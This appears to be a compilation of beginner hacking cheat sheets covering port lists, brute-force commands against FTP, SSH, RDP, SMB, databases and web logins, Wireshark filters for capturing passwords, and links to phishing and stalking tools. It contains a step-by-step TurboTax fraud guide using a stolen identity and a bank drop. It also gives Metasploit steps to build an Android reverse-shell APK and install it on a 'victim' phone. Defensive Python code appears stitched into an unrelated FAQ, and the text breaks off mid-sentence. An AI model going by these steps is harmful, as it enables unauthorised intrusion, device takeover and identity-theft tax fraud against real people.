1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,689,705,771,783,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4679,4848,5000,5038,5040,5051,5060-5061,5093,5168,5247,5250,5351,5353,5355,5400,5405,5432-5433,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7001,7021,7071,7080,7144,7181,7210,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8800,8812,8834,8880,8888-8890,8899,8901-8903,9000,9002,9080-9081,9084,9090,9099-9100,9111,9152,9200,9390-9391,9495,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27017,27888,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48899,49152,50000-50004,50013,50500-50504,52302,55553,57772,62078,62514,65535

UDP Discovery  🔎

53,123,161,1434

Authentication Ports  ⌨️

1494,80,5985,5986,8200,902,9084,6129

Easy-win Ports  🏆

1099,1098,8500,623,6002,700,4848,9060,10000,11211,3632,3299

Database Ports  ⚗️

3306,1521-1527,5432,5433,1433,3050,3351,1583,8471,9471

NoSQL Ports  🚫

27017,28017,27080,5984,900,9160,7474,6379,8098




The Beginner Bruteforce Guide

Requirements:-

- Wordlist (https://github.com/danielmiessler/SecLists)
- Username(or userlist /usr/share/wordlist)
- Kali Linux or Termux (Google For Termux For Tools Installation!)
- Working Internet

FTP Bruteforce 📁

1️⃣ Hydra 🐍
$ hydra -l superuser -P pwd.txt -v -f -e ns -t 5 -w 20 <ip> ftp >> brute_ftp.out

$ hydra -t 5 -V -f -l root -P common.txt ftp://<ip> >> brute_ftp.out

$ hydra -v -f -l ftp -P fpass.lst -t 10 ftp://<ip> >> brute_ftp.out

$ hydra -l root -P 500-worst-passwords.txt <ip> ftp

For the parameters please type hydra -h !

2️⃣ Medusa 🗿
$ medusa -u test -P 500-worst-passwords.txt -h <ip> -M ftp

$ medusa -M ftp -h <ip> -u username -p password


SSH 📡

1️⃣ Medusa 🗿
$ medusa -h <target> -P /root/pasword.txt -u root -M ssh

2️⃣ NCrack 🦀
$ ncrack -p ssh -u root --pass 'root' <target>

3️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -P common.txt localhost ssh >> brute_ssh.out

$ hydra -v -l root -P 500-worst-passwords.txt <target> ssh >> brute_ssh.out

$ hydra -v -l root -P fpass.lst -t 5 ssh://ip -o brute_ssh.out

Telnet 📞

1️⃣ Hydra 🐍
$ hydra -v -l root -P fpass.lst -t 5 telnet://<ip> >> brute_telnet.out

$ hydra -l username -P wordlist -t 4 -s 23 -e ns -f -v <ip> telnet >> brute_telnet.out

2️⃣ Medusa 🗿
$ medusa -h <ip> -M telnet -U user.txt -P password.txt

SMTP 📧

1️⃣ Medusa 🗿
$ medusa -M smtp -m AUTH:NTLM -U accounts.txt -p password

$ medusa -M smtp -m EHLO:world -U accounts.txt -p password

SMTP VRFY 📧

1️⃣ Medusa 🗿
$ medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com

2️⃣ Smtp-User-Enum 🔩
$ smtp-user-enum -M VRFY -U /home/weak_wordlist/userall.txt -t <ip>

SMTP RCPT TO 📧

1️⃣ Medusa 🗿
medusa -M smtp-vrfy -m VERB:RCPT TO -U accounts.txt -p domain.com

HTTP 🔓

1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -p 12345678 -e s -V -f <ip> http-get

HTTPS 🔐

1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -P List.txt -e s -V -f <ip> https-get

POP3 📥

1️⃣ Medusa 🗿
$ medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password

$ medusa -M pop3 -m DOMAIN:<url> -U accounts.txt -p password

2️⃣ Hydra 🐍
$ hydra -l muts -P pass.txt my.pop3.mail pop3 >> brute_pop3.out

$ hydra -S -l <youremail@domain> -P password.lst pop3.live.com -s 995 pop3 >> brute_pop3.out

SMB 📡

1️⃣ Hydra 🐍
$ hydra  -v  -l Administrator -P fpass.lst smb://<ip> >> brute_smb.out

$ hydra -L user.txt -P pass.txt -e ns -f -v -V -w5 <ip> smb >> brute_smb.out

2️⃣ Medusa 🗿
$ medusa -h <ip> -u administrator -P passwords.txt -e ns -M smbnt >> brute_smb.out

Cisco 🖲
1️⃣ Hydra 🐍
$ hydra -f -v -P pass.txt <ip> cisco >> brute_cisco.out

$ hydra -m cloud -P pass.txt <ip> cisco-enable >> brute_cisco.out

MSSQL 🧱

1️⃣ Hydra 🐍
$ hydra -v -l sa -P fpass.lst -t 4 <ip> mssql -o brute_mssql.out

$ hydra -t 5 -V -f -l sa -P "C:\pass.txt" <ip> mssql

$ hydra mssql://<ip>:1433 -l sa -P /root/Desktop/parolalar

MySQL 📅

1️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql

$ hydra -v -l root -P fpass.lst -t 1 mysql://ip -o brute_mysql.out

RDP 🔮

1️⃣ Hydra 🐍
$ hydra -v -f -l administrator -P common.txt rdp://<ip> // not good

2️⃣ Medusa 🗿
$ medusa -u administrator -P /usr/share/john/password.lst -h 10.10.10.71 -M rdp

3️⃣ NCrack 🦀
$ ncrack -p rdp -u administrator --pass 'password' -iL in2

$ ncrack -vv --user offsec -P password-file.txt rdp://<ip>

WebForm 🕸
1️⃣ Hydra 🐍
$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"




Domain Info Gathering


1️⃣ WHOIS query
2️⃣ DNS query
3️⃣ NsLookup query
4️⃣ Domain name deletion time record query
5️⃣ Archive record batch

Encode & Decode

Encoder is a utility to help you encode and decode data in various formats, build hashes of common hashing functions and do general text transformations.

Intelligence Gathering

Recon can swiftly gather intelligence on a wide range of targets, sourced from public databases to explore the relationship between large and complicated datasets.

Web Resource Discovery

UNFold supports both resource enumeration through dictionaries and active spidering during the vulnerability discovery process.
https://secapps.com/suite/

*Some Tools*

NodeJsScan - A Static Security Code Scanner For Node.js Applications
https://github.com/ajinabraham/NodeJsScan

Jok3R - Network And Web Pentest Framework
https://github.com/koutto/jok3r

WiFi Brute Force Attack
https://github.com/TideSec/WDScanner
https://github.com/Tlgyt/WiBr
https://github.com/galkan/crowbar

Raptor Web-based Source Code Vulnerability Scanner
https://github.com/Vulnerability-scanner/raptor

Prowler – Distributed Network Vulnerability Scanner
https://github.com/tlkh/prowler

Fuxi Scanner - Network Security Vulnerability Scanner
https://github.com/ym2011/PEST/tree/master/Fuxi-Scanner

29 Docker Security Tools
https://sysdig.com/blog/20-docker-security-tools/

R3Con1Z3R - Web Information Gathering Tool
https://github.com/abdulgaphy/r3con1z3r

TIDoS - Framework - Offensive Manual Web Application Pentesting Framework
https://github.com/0xInfection/TIDoS-Framework

Th3inspector - Information Gathering
https://github.com/Moham3dRiahi/Th3inspector

EagleEye - Stalk Your Friends
https://github.com/ThoughtfulDev/EagleEye

BlackEye - Phishing Tool
https://github.com/thelinuxchoice/blackeye

Webkiller - Information Gathering Tool
https://github.com/ultrasecurity/webkiller

BruteSpray - NMap Brute Force Script
https://github.com/x90skysn3k/brutespray

DirSearch - Web Path Scanner
https://github.com/maurosoria/dirsearch

Masscan - TCP Port Scanner 
https://github.com/robertdavidgraham/masscan

Mercury - Collect Information
https://github.com/MetaChar/Mercury

DevPloit - Information Gathering
https://github.com/vaginessa/Devploit

TinfoLeak - Twitter Intelligence Analysis
https://github.com/vaguileradiaz/tinfoleak

Photon - Fast Crawler For OSINT
https://github.com/s0md3v/Photon

Raccoon - Offensive Security Tool For Reconnaissance And Information Gathering
https://github.com/evyatarmeged/Raccoon

SpiderFoot - OSINT Collection Automated
https://github.com/smicallef/spiderfoot

pwnedOrNot - OSINT Tools For Finding Password Of E-Mails
https://github.com/thewhiteh4t/pwnedOrNot





TURBO TAX WAVE SAUCE

*🔥🔥*

1. Get Pro ( For Info Use Only )

2. Make burner number if you
don’t already have

3. Create email to match pro name

4. Create account with turbo tax with pro name.

( ALWAYS CHOOSE FIRST TIME FILING OPTION OR YOU’LL BE REJECTED FOR
NOT HAVING AGI  # )

5. Get W2 ( FROM ME IF YOU DONT HAVE ONE ) & ( for NUMBERS USE ONLY )

6. For ALL NUMBERS on filing out app use W2 numbers
KEY FACTOR

7. Get a bank drop, prepaid or whatever don’t matter, make sure it has account and routing number

8. Use the bank drop on filing part for direct deposit!!!!

9. Finish app using pro info.

10. Wait until it’s accepted. If it’s not accepted it’ll tell you were you messed up and how to fix it.( shouldn’t get denied if you did THESE STEPS correct )

GOOD LUCK ! WE ALL EAT 🤑💯





BEGINNERS NETWORK FAQ


#Networking

How does traceroute or tracert work?

Traceroute and tracert determine the route from the host computer to a remote machine. They are used to identify whether packets are redirected or take too long, and to count the hops traffic takes to reach a host.

Basic Information Security :

Why Should We Conduct A Penetration Test?

IT is an integral part of every company's business today. Therefore, not only the amount of business-critical data that is stored on IT systems grows, but also the dependency on a working IT infrastructure. This leads to an increased amount of attacks against IT systems in the form of industrial espionage, denial of service attacks and other possibilities to significantly harm a company. Important corporate secrets are spied on and sold to competitors.

The availability of systems is interrupted, as a non-working IT is causing more and more problems today. No new orders are placed, because competitors somehow always have the better offer. A penetration test gives you information about your systems' vulnerabilities, how probable a successful attack against your infrastructure is and how you can protect yourself against potential security breaches in the future.

Are There Legal Requirements For Penetration Tests?

It may not be mandatory to do a penetration test for corporations, but the German law for example includes numerous text passages in its commercial laws which could be validated by conducting a penetration test.

What Is The Workflow Of A Penetration Test?

In advance of every penetration test, an individual meeting is held. In this meeting, the various possibilities of a penetration test in relation to the customer's systems are discussed. A penetration test only makes sense if it is realised in an individual and customer-oriented way.

What Time Investment Do You Estimate For A Penetration Test?

The time investment for a penetration test varies from case to case depending on the systems to be tested and the individual test requirements. Usually, the time needed ranges from a few days to several weeks. One goal of the preliminary meeting is to get enough information about the systems to be tested to estimate the optimal length for the penetration test.

Human resources on the customer's side are usually only marginally bound. Most notably, a contact person for questions during the exploitation phase is required.

What Are Blackbox And Whitebox Tests?

A blackbox test is normally defined as a test where the penetration testers do not have any more information than attackers without internal knowledge might have. The idea is to check how deeply potential attackers can compromise your systems without any kind of internal information or access. All knowledge has to be gathered with classical reconnaissance (finding as much information as possible about the target) and enumeration (a deeper look at individual systems).

What Happens To Confidential Data Redteam Pentesting Gathers During The Penetration Test?

RedTeam Pentesting commits itself to absolute secrecy regarding your confidential data. A non-disclosure agreement (NDA) determining that RedTeam Pentesting treats a client's data as confidential is already part of every contract. All customer data, including information that is used to prepare a first quotation, is subject to the same obligation to confidentiality. At the end of a penetration test, all data and possible storage media are either securely destroyed or handed back to the client.

Web Penetration testing

What are some ways to avoid brute force hacks?

You can stop authentication after a certain amount of attempts and lock the account. You can also block IP addresses that flood the network. You can use IP restrictions on the firewall or server.
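The two controls named in this answer, account lockout after repeated failures and blocking source IPs that flood the service, as an added example that is not part of the original FAQ. The simplified log format, the thresholds and all function names are assumptions made for illustration; the log lines are constructed and use documentation IP ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: simplified sshd-style lines, documentation IP ranges.
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[811]: Failed password for root from 203.0.113.7 port 40112 ssh2
2024-05-01T10:00:03 sshd[811]: Failed password for root from 203.0.113.7 port 40114 ssh2
2024-05-01T10:00:05 sshd[811]: Failed password for root from 203.0.113.7 port 40116 ssh2
2024-05-01T10:00:07 sshd[811]: Failed password for root from 203.0.113.7 port 40118 ssh2
2024-05-01T10:00:09 sshd[811]: Failed password for root from 203.0.113.7 port 40120 ssh2
2024-05-01T10:05:00 sshd[820]: Failed password for alice from 192.0.2.10 port 51000 ssh2
2024-05-01T10:05:20 sshd[820]: Accepted password for alice from 192.0.2.10 port 51002 ssh2
2024-05-01T10:20:00 sshd[830]: Failed password for invalid user admin from 198.51.100.9 port 60000 ssh2
2024-05-01T10:20:01 sshd[830]: Failed password for bob from 198.51.100.9 port 60001 ssh2
2024-05-01T10:20:02 sshd[830]: Failed password for carol from 198.51.100.9 port 60002 ssh2
2024-05-01T10:20:03 sshd[830]: Failed password for invalid user test from 198.51.100.9 port 60003 ssh2
2024-05-01T10:20:04 sshd[830]: Failed password for dave from 198.51.100.9 port 60004 ssh2
2024-05-01T11:00:00 sshd[840]: Failed password for erin from 192.0.2.50 port 42000 ssh2
2024-05-01T11:11:00 sshd[840]: Failed password for erin from 192.0.2.50 port 42001 ssh2
2024-05-01T11:22:00 sshd[840]: Failed password for erin from 192.0.2.50 port 42002 ssh2
2024-05-01T11:33:00 sshd[840]: Failed password for erin from 192.0.2.50 port 42003 ssh2
2024-05-01T11:44:00 sshd[840]: Failed password for erin from 192.0.2.50 port 42004 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def analyse(log_text, max_failures=5, window_minutes=10):
    """Return (blocked_ips, locked_accounts): key -> time the threshold was hit.

    A source IP is blocked and an account is locked once it accumulates
    max_failures failed logins inside a sliding window.
    """
    window = timedelta(minutes=window_minutes)
    ip_failures = defaultdict(deque)    # source IP -> recent failure times
    user_failures = defaultdict(deque)  # account   -> recent failure times
    blocked, locked = {}, {}

    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        ts = datetime.fromisoformat(m["ts"])
        user, ip = m["user"], m["ip"]

        if m["result"] == "Accepted":
            # A successful login resets the counter of an account that is not locked.
            if user not in locked:
                user_failures[user].clear()
            continue

        for key, table, verdicts in ((ip, ip_failures, blocked),
                                     (user, user_failures, locked)):
            recent = table[key]
            recent.append(ts)
            while recent and ts - recent[0] > window:
                recent.popleft()  # drop failures that fell out of the window
            if len(recent) >= max_failures and key not in verdicts:
                verdicts[key] = ts
    return blocked, locked


if __name__ == "__main__":
    blocked, locked = analyse(SAMPLE_LOG)
    print("block these source IPs:", sorted(blocked))
    print("lock these accounts:   ", sorted(locked))
```

In the sample, the per-account counter misses the source that tries one guess against five different accounts, and only the per-IP counter flags it; the slow source at 192.0.2.50 stays under both thresholds until the window is widened.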

Encryption, SSL, Cryptography, Authentication Questions


What kind of penetration can be done with the Diffie Hellman exchange?

A hacker can use the man in the middle attack with the Diffie Hellman exchange since neither side of the exchange is authenticated. Users can use SSL or encryption between messages to add some kind of security and authentication.
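Why the missing authentication matters, and how authenticating the exchanged values exposes a substitution, as an added example that is not part of the original FAQ. It is an in-memory simulation with a toy group; the HMAC over a pre-shared key stands in for the certificate signatures SSL/TLS uses, and every name and parameter here is an assumption made for illustration.

```python
import hashlib
import hmac
import secrets

# Toy group for illustration only: 2**127 - 1 is prime but far too small for real use.
P = 2**127 - 1
G = 3


def keypair():
    """Return (private exponent, public value g^priv mod p)."""
    priv = secrets.randbelow(P - 3) + 2
    return priv, pow(G, priv, P)


def session_key(priv, peer_pub):
    """Derive a session key from the Diffie-Hellman shared secret."""
    secret = pow(peer_pub, priv, P)
    return hashlib.sha256(secret.to_bytes(16, "big")).digest()


def auth_tag(psk, role, pub):
    """Authenticate a public value with a long-term pre-shared key (assumed)."""
    return hmac.new(psk, role + pub.to_bytes(16, "big"), hashlib.sha256).digest()


def run_exchange(tampered, psk=None):
    """Simulate one exchange between Alice and Bob.

    tampered=True means a party in the middle replaces both public values
    with its own. psk=None is plain, unauthenticated Diffie-Hellman.
    """
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    m_priv, m_pub = keypair()  # the party in the middle

    # Each side tags the value it really sent; the middle has no psk to forge one.
    a_tag = auth_tag(psk, b"A", a_pub) if psk else None
    b_tag = auth_tag(psk, b"B", b_pub) if psk else None

    seen_by_bob = m_pub if tampered else a_pub
    seen_by_alice = m_pub if tampered else b_pub

    if psk:
        bob_ok = hmac.compare_digest(a_tag, auth_tag(psk, b"A", seen_by_bob))
        alice_ok = hmac.compare_digest(b_tag, auth_tag(psk, b"B", seen_by_alice))
        if not (bob_ok and alice_ok):
            return {"accepted": False}  # substitution detected, abort

    k_alice = session_key(a_priv, seen_by_alice)
    k_bob = session_key(b_priv, seen_by_bob)
    return {
        "accepted": True,
        "keys_match": k_alice == k_bob,
        "middle_knows_alice_key": k_alice == session_key(m_priv, a_pub),
        "middle_knows_bob_key": k_bob == session_key(m_priv, b_pub),
    }


if __name__ == "__main__":
    print("plain, untouched:   ", run_exchange(False))
    print("plain, tampered:    ", run_exchange(True))
    print("authenticated, tamp:", run_exchange(True, b"constructed-demo-psk"))
```

Without authentication both sides accept the exchange and never learn that their keys differ; with the tag check the same substitution makes the handshake fail.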

How can you encrypt email messages?

You can use PGP to encrypt email messages or some other form of a public private key pair system where only the sender and the recipient can read the messages.

What is the difference between asymmetric and symmetric encryption?

Symmetric encryption uses the same key for decryption and encryption.
Asymmetric uses different keys.


Basic Wireshark Commands


Basic Commands For Frames With Passwords:
1️⃣ tcp.srcport == 22
2️⃣ http.host
3️⃣ dns.qry.name
4️⃣ ip contains google
5️⃣ ip contains .gov
6️⃣ tcp contains password
7️⃣ tcp contains "GET /"
8️⃣ tcp contains "POST /"
9️⃣ ip.src == <ip>
1️⃣0️⃣ ip.dst == <ip>
1️⃣1️⃣ ip.addr == <ip>
1️⃣2️⃣ tcp.port == 80
1️⃣3️⃣ tcp.dstport == 22
1️⃣4️⃣ tcp.srcport == 22

Show only FTP and DNS traffic:
ftp || dns

Show all traffic except ARP and ICMP:
!arp && !icmp

Show only HTTP to or from 192.168.0.1:
ip.addr == 192.168.0.1 && http
(change to your own address)

Search for zip or exe files:
tcp matches "zip" or tcp matches "exe"

Search for an ASCII string containing "PASS":
tcp contains "PASS"
 
Search for a specific ip address:
ip.addr == 192.168.0.1

Exclude an IP address:
not ip.addr == 192.168.0.1

Search for MAC address:
eth.addr == 00:11:11:35:11:14

Search by port:
tcp.port == 139
 
Search for DNS port:
udp.dstport == 53

Search for HTTP POST request: Expression filter.
http.request.method == "POST"

POP3 USER request:
pop.request.command == "USER"
pop.request.command == "PASS"

FTP USER request:
ftp.request.command == "USER"
ftp.request.command == "PASS"

Find FTP data channel:
 ftp.response.code == 227 || ftp.request.command == "PORT"

SMTP Search for email recipient:
smtp.req.parameter == "TO: <mail@blop.dk>"
(change to your target)

Search for sender:
smtp.req.parameter == "FROM: <mail@blop.dk>"
(change to your target)

SMTP Find all email recipients:
 smtp.req.command == "RCPT"

Find windows client names:
browser.server

Browser Host Announcement:
browser.command == 0x1
 
Hacking search string on http:
 http.request.method == "GET" && frame contains "hacking"

Search for specific URI:
http.request.uri == "<website>"
 
Search for all where a connection has been created SYN + ACK (TCP connection was Successful):
 tcp.flags == 0x12

SSL / TLS handshake - Shows all SSL / TLS handshakes:
ssl.record.content_type == 22
 
Search for HTTPS Server Hello - See if DH or DHE is used to encrypt connections.
 ssl.handshake.certificate
 
Search for HTTP GET that contains index.php:
http.request.method == "GET" && http.request.full_uri matches "index\.php\?.*="

http.request.method == "GET" && http.request.full_uri contains "index.php?"

Look for .CN or .RU in HTTP:
http.host matches "(?i)[.](ru|cn)$"

DNS:
dns.qry.name matches "(?i)[.](cn|ru)$"

Filter on ports: This filter captures traffic on port 80 and 3128 only:
tcp dst port 80 or tcp dst port 3128

This filter captures all traffic to the 192.168 network:
dst net 192.168

This filter captures all traffic from the 192.168 network:
src net 192.168

This filter captures all traffic to or from the 192.168 network:
net 192.168

This filter captures all traffic to or from the following wlan (Wireless):
wlan host 00:25:64:8c:9f:75

This filter only captures traffic to and from 192.168.10.1:
host 192.168.10.1

This filter captures all traffic to or from the following network with a net mask:
net 192.168.10.0 mask 255.255.255.0

Filter out (port 80 traffic and DNS traffic):
!tcp.port == 80 and !udp.port == 53

This filter only looks at traffic on the follow port range 6881 to 6999 (BitTorrent):
portrange 6881-6999

Operators:
1️⃣ Negation - (! Or not)
2️⃣ Concatenation (AND)
3️⃣ Alternation (or)

Comparison Operators:
Description                 Symbol      Text
equal to                    ==          eq
or                          ||          or
and                         &&          and
greater than                >           gt
less than                   <           lt
greater than or equal to    >=          ge
less than or equal to       <=          le
not                         !           not
not equal to                !=          ne
contains                                contains
matches                                 matches

This filter captures all traffic to and from 192.168.10.1 that is sent to TCP port 53.
AND requires both sides of the operator to match before traffic is captured.
host 192.168.10.1 and tcp dst port 53


This filter captures all traffic to or from 192.168.10.1, or traffic sent to TCP port 53:
host 192.168.10.1 or tcp dst port 53

This filter captures all traffic whose source address is outside the 10.2 network:
not src net 10.2.0.0/16






darksploit installation process for termux

Execute these commands one by one to install DarkSploit.

$ apt update

$ apt upgrade

$ apt install git

$ apt install python

$ apt install python2

$ git clone https://github.com/LOoLzeC/DarkSploit

$ cd DarkSploit

$ cd install

$ sh installtermux.sh

$ pip2 install -r requirements.txt

$ cd ..

Now Run DarkSploit :

python2 DrXp.py

DarkSploit commands :

$ show options

$ show exploits

$ use exploits

Here you get all options to use this tool.






Kalimux installation process for termux

📝 Usage :- 
Kalimux is bash based script which is used to install kali Linux in android mobile in termux with gui and without root.

Kalimux

🔥Installation and usage guide

$ apt-get update -y

$ apt-get upgrade -y

 $ pkg install git -y

$ git clone https://github.com/noob-hackers/kalimux

$ ls

$ cd kalimux

$ ls

 $ sh kalimux.sh

* After installation completes, a block of text will appear. Copy it with a long press on the text. *

$ ./start-kali.sh

Linux has now been installed successfully in Termux without root. If you would like to use Kali Linux with a GUI on your Android device, download an application called VNC Viewer. Then start Kali Linux in Termux, paste the copied text into it, and wait for the complete Linux OS to install in Termux. After installation completes, run this command in Kali:

$ vncserver-start

The server now starts on host 127.0.0.1:5901. Open VNC Viewer, click the + icon and create host access. The Kali Linux GUI has now started in VNC Viewer, so start practising.

Note: Don't remove Termux from the background while using Kali Linux in VNC Viewer, because the VNC host files are in the Termux app.








Instahack installation process for termux


📝 Usage :-

Instahack is tool used for instagram followers and maintaining Instagram by termux.

Instagramhack

🔥INSTAHACK🔥

$ apt update && apt upgrade

$ pkg install git

$ pkg install wget

$ pkg install curl

$ pkg install openssl-tool.

$ git clone https://github.com/thelinuxchoice/inshackle

Once it is installed, type ls to list up all what is in your terminal, after that type cd inshackle then run it by typing bash inshackle.sh or ./inshackle.sh
With the help of Instahackle, We can do the following things  :

[01] Unfollow Tracker
[02] Increase Followers
[03] Download Stories
[04] Download Saved Content
[05] Download Following List
[06] Download Followers List
[07] Download Profile Info
[08] Activate Unfollower








Install 200tools for termux



200tools is a tool that provides tailor-made for beginners

$ apt update && apt upgrade -y

$ apt install git

$ apt install php

$ apt install curl

$ apt install ruby

$ apt install figlet

$ apt install python2

$ gem install lolcat

$ git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv3

$ cd TOOLSINSTALLERv3

$ chmod +x TUANB4DUT.sh

$ sh TUANB4DUT.sh





Full guide for installation and usage of metasploit in termux.



METASPLOIT INSTALLATION AND RUN COMMANDS

What is payload ?
A payload is a malware function of Trojan horse which transmit data from victim to attacker these type of malwares is called payload. 

Commands :

$ apt-get update

$ apt-get updgrade

pkg install unstable-repo OR apt install unstable-repo

pkg install metasploit OR apt install metasploit

After installation

$ msfconsole

Wait 2min until open

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your IP) LPORT=4444 R > /sdcard /shell.apk

Want IP go to google search what is my IPv4 address 1st link open copy your ip

Payload is on internal storage send payload to victim install it on victim mobile

$ pkg install postgresql

$ pg_ctl -D $PREFIX/var/lib/postgresql start

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=ip R > /sdcard/name.apk

$ msfconsole

$ use exploit/multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set LHOST

$ set LPORT

$ exploit







Types of Cybercrime


The following list presents the common types of cybercrimes:

Computer fraud:
Intentional deception for personal gain via the use of computer systems.

Privacy violation:
Exposing personal information such as email addresses, phone number, account details, etc. on social media, websites, etc.

Identity theft:
Stealing personal information from somebody and impersonating that person.

Sharing copyrighted files/information:
This involves distributing copyright protected files such as ebooks and computer programs etc.

Electronic funds transfer:
This involves gaining an un-authorized access to bank computer networks and making illegal fund transfers.

Electronic money laundering:
This involves the use of the computer to launder money.

ATM fraud:
This involves intercepting ATM card details such as account number and PIN numbers. These details are then used to withdraw funds from the intercepted accounts.

Denial of service attacks:
This involves the use of computers in multiple locations to attack servers with a view of shutting them down.

Spam:
Sending unauthorized emails. These emails usually contain advertisements.






How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...